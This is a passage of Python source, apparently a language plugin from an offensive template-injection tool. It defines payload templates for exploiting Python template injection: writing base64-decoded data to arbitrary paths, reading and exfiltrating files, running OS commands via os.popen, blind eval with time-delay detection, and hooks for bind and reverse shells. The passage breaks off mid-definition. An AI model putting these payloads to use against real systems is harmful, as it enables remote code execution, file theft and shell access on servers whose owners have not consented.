| 10 | class Python(Plugin): |
| 11 | |
| 12 | def language_init(self): |
| 13 | |
| 14 | self.update_actions({ |
| 15 | 'render' : { |
| 16 | 'render': """str(%(code)s)""", |
| 17 | 'header': """'%(header)s'+""", |
| 18 | 'trailer': """+'%(trailer)s'""", |
| 19 | 'test_render': """'%(s1)s'.join('%(s2)s')""" % { |
| 20 | 's1' : rand.randstrings[0], |
| 21 | 's2' : rand.randstrings[1] |
| 22 | }, |
| 23 | 'test_render_expected': '%(res)s' % { |
| 24 | 'res' : rand.randstrings[0].join(rand.randstrings[1]) |
| 25 | } |
| 26 | }, |
| 27 | 'write' : { |
| 28 | 'call' : 'evaluate', |
| 29 | 'write' : """open("%(path)s", 'ab+').write(__import__("base64").urlsafe_b64decode('%(chunk_b64)s'))""", |
| 30 | 'truncate' : """open("%(path)s", 'w').close()""" |
| 31 | }, |
| 32 | 'read' : { |
| 33 | 'call': 'evaluate', |
| 34 | 'read' : """__import__("base64").b64encode(open("%(path)s", "rb").read())""" |
| 35 | }, |
| 36 | 'md5' : { |
| 37 | 'call': 'evaluate', |
| 38 | 'md5': """__import__("hashlib").md5(open("%(path)s", 'rb').read()).hexdigest()""" |
| 39 | }, |
| 40 | 'evaluate' : { |
| 41 | 'call': 'render', |
| 42 | 'evaluate': """%(code)s""", |
| 43 | 'test_os': """'-'.join([__import__('os').name, __import__('sys').platform])""", |
| 44 | 'test_os_expected': '^[\w-]+$' |
| 45 | }, |
| 46 | 'execute' : { |
| 47 | 'call': 'evaluate', |
| 48 | 'execute': """__import__('os').popen(__import__('base64').urlsafe_b64decode('%(code_b64)s').decode()).read()""", |
| 49 | 'test_cmd': bash.echo % { 's1': rand.randstrings[2] }, |
| 50 | 'test_cmd_expected': rand.randstrings[2] |
| 51 | }, |
| 52 | 'blind' : { |
| 53 | 'call': 'evaluate_blind', |
| 54 | 'test_bool_true' : """'a'.join('ab') == 'aab'""", |
| 55 | 'test_bool_false' : 'True == False' |
| 56 | }, |
| 57 | 'evaluate_blind' : { |
| 58 | 'call': 'evaluate', |
| 59 | 'evaluate_blind': """eval(__import__('base64').urlsafe_b64decode('%(code_b64)s').decode()) and __import__('time').sleep(%(delay)i)""" |
| 60 | }, |
| 61 | 'bind_shell' : { |
| 62 | 'call' : 'execute_blind', |
| 63 | 'bind_shell': bash.bind_shell |
| 64 | }, |
| 65 | 'reverse_shell' : { |
| 66 | 'call': 'execute_blind', |
| 67 | 'reverse_shell' : bash.reverse_shell |
| 68 | }, |
| 69 | 'execute_blind' : { |